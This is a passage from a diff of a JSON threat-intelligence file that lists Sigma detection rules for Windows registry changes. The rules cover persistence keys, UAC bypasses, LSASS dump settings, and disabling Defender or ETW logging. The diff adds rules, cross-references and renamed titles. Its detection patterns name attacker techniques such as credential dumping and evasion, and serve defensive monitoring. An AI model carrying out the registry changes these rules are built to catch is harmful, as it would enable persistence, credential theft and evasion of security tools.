"2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", "value": "IE Change Domain Zone" }, + { + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_persistence_natural_language.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/", + "https://persistence-info.github.io/Data/naturallanguage6.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", + "value": "Potential Persistence Via DLLPathOverride" + }, { "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", "meta": { @@ -14473,6 +18141,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", "value": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download" }, @@ -14489,8 +18166,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml" ], "tags": [ @@ -14500,6 +18177,15 @@ "car.2019-04-001" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "value": "UAC Bypass via Event Viewer - Registry Set" }, @@ -14518,8 +18204,8 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" ], "tags": [ @@ -14530,6 +18216,30 @@ "uuid": "480421f9-417f-4d3b-9552-fd2728443ec8", "value": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification" }, + { + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + ], + "filename": "registry_set_persistence_mpnotify.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/mpnotify.html", + "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "92772523-d9c1-4c93-9547-b0ca500baba3", + "value": "Potential Persistence Via Mpnotify" + }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { @@ -14545,8 +18255,8 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" ], "tags": [ @@ -14578,6 +18288,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", "value": "Potential EventLog File Location Tampering" }, @@ -14644,8 +18363,8 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" ], "tags": [ @@ -14669,9 +18388,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://github.com/deepinstinct/Lsass-Shtinkering", "https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", - "https://github.com/deepinstinct/Lsass-Shtinkering", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml" ], "tags": [ @@ -14679,6 +18398,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", "value": "Lsass Full Dump Request Via DumpType Registry Settings" }, @@ -14695,9 +18423,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" ], "tags": [ @@ -14730,6 +18458,15 @@ "attack.t1564.002" ] }, + "related": [ + { + "dest-uuid": "8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "value": "Hide User Account Via Special Accounts Reg Key" }, @@ -14746,9 +18483,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" ], "tags": [ @@ -14757,9 +18494,43 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "46dd5308-4572-4d12-aa43-8938f0184d4f", "value": "Bypass UAC Using DelegateExecute" }, + { + "description": "Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_persistence_ie.yml", + "level": "low", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ie.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", + "value": "Modification of IE Registry Settings" + }, { "description": "Detects that a powershell code is written to the registry as a service.", "meta": { @@ -14781,6 +18552,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", "value": "PowerShell as a Service in Registry" }, @@ -14807,6 +18587,15 @@ "attack.t1574.012" ] }, + "related": [ + { + "dest-uuid": "ffeb0780-356e-4261-b036-cfb6bd234335", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ad89044a-8f49-4673-9a55-cbd88a1b374f", "value": "Enabling COR Profiler Environment Variables" }, @@ -14856,6 +18645,15 @@ "cve.2021.1675" ] }, + "related": [ + { + "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e0813366-0407-449a-9869-a2db1119dc41", "value": "Suspicious Printer Driver Empty Manufacturer" }, @@ -14881,6 +18679,15 @@ "attack.t1547.003" ] }, + "related": [ + { + "dest-uuid": "61afc315-860c-4364-825d-0d62b2e91edc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", "value": "Set TimeProviders DllName" }, @@ -14921,8 +18728,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", "https://twitter.com/dottor_morte/status/1544652325570191361", + "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml" ], "tags": [ @@ -14954,33 +18761,18 @@ "attack.t1070.005" ] }, + "related": [ + { + "dest-uuid": "a750a9f6-0bde-4bb3-9aae-1e2786e9780c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", "value": "Disable Administrative Share Creation at Startup" }, - { - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" - ], - "filename": "registry_set_mpnotify_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek", - "https://persistence-info.github.io/Data/mpnotify.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mpnotify_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "92772523-d9c1-4c93-9547-b0ca500baba3", - "value": "Persistence Via Mpnotify" - }, { "description": "Detects disabling Windows Defender Exploit Guard Network Protection", "meta": { @@ -15005,6 +18797,30 @@ "uuid": "bf9e1387-b040-4393-9851-1598f8ecfae9", "value": "Disable Exploit Guard Network Protection on Windows Defender" }, + { + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_persistence_lsa_extension.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1476286368385019906", + "https://persistence-info.github.io/Data/lsaaextension.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "value": "Potential Persistence Via LSA Extensions" + }, { "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", "meta": { @@ -15018,8 +18834,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd", + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml" ], "tags": [ @@ -15027,6 +18843,15 @@ "attack.t1547.010" ] }, + "related": [ + { + "dest-uuid": "43881e51-ac74-445b-b4c6-f9f9e9bf23fe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "value": "Bypass UAC Using Event Viewer" }, @@ -15077,6 +18902,15 @@ "attack.t1559.002" ] }, + "related": [ + { + "dest-uuid": "232a7e42-cd6e-4902-8fe9-2960f529dd4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "63647769-326d-4dde-a419-b925cc0caf42", "value": "Enable Microsoft Dynamic Data Exchange" }, @@ -15104,6 +18938,15 @@ "attack.t1204.002" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "60936b49-fca0-4f32-993d-7415edcf9a5d", "value": "New Application in AppCompat" }, @@ -15120,8 +18963,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" ], "tags": [ @@ -15145,8 +18988,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", "https://twitter.com/pabraeken/status/998627081360695297", + "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", "https://twitter.com/VakninHai/status/1517027824984547329", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" ], @@ -15155,6 +18998,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", "value": "ScreenSaver Registry Key Set" }, @@ -15171,8 +19023,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", "https://persistence-info.github.io/Data/autodialdll.html", + "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml" ], "tags": [ @@ -15180,7 +19032,7 @@ ] }, "uuid": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", - "value": "Persistence Via AutodialDLL" + "value": "Potential Persistence Via AutodialDLL" }, { "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", @@ -15246,10 +19098,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" ], "tags": [ @@ -15281,6 +19133,15 @@ "attack.t1564.001" ] }, + "related": [ + { + "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5a5152f1-463f-436b-b2f5-8eceb3964b42", "value": "Modification of Explorer Hidden Keys" }, @@ -15307,6 +19168,15 @@ "attack.t1137" ] }, + "related": [ + { + "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5df86130-4e95-4a54-90f7-26541b40aec2", "value": "Registry Modification to Hidden File Extension" }, @@ -15321,8 +19191,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml" ], "tags": [ @@ -15331,6 +19201,22 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "42f0e038-767e-4b85-9d96-2c6335bad0b5", "value": "Adwind RAT / JRAT - Registry" }, @@ -15357,6 +19243,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "724ea201-6514-4f38-9739-e5973c34f49a", "value": "Bypass UAC Using SilentCleanup Task" }, @@ -15373,9 +19268,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml" ], "tags": [ @@ -15423,9 +19318,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope", + "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" ], "tags": [ @@ -15448,10 +19343,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", - "https://github.com/elastic/detection-rules/issues/1371", - "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", + "https://github.com/elastic/detection-rules/issues/1371", + "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", + "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" ], "tags": [ @@ -15460,33 +19355,18 @@ "attack.t1112" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", "value": "DNS-over-HTTPS Enabled by Registry" }, - { - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_chm_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/htmlhelpauthor.html", - "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chm_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "976dd1f2-a484-45ec-aa1d-0e87e882262b", - "value": "CHM Helper DLL Persistence" - }, { "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", "meta": { @@ -15532,6 +19412,15 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", "value": "Hide Schedule Task Via Index Value Tamper" }, @@ -15548,9 +19437,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://twitter.com/MichalKoczwara/status/1553634816016498688", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" ], "tags": [ @@ -15573,17 +19462,17 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", "http://managed670.rssing.com/chan-5590147/all_p1.html", "https://twitter.com/_xpn_/status/1268712093928378368", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml" ], "tags": [ @@ -15592,34 +19481,18 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", "value": "ETW Logging Disabled In .NET Processes - Sysmon Registry" }, - { - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/30", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_shim_databases_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_shim_databases_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.011" - ] - }, - "uuid": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", - "value": "Registry Key Creation or Modification for Shim DataBase" - }, { "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", "meta": { @@ -15641,8 +19514,17 @@ "attack.t1546.015" ] }, + "related": [ + { + "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", - "value": "COM Hijacking For Persistence With Suspicious Locations" + "value": "Potential Persistence Via COM Hijacking From Suspicious Locations" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", @@ -15659,8 +19541,8 @@ "logsource.product": "windows", "refs": [ 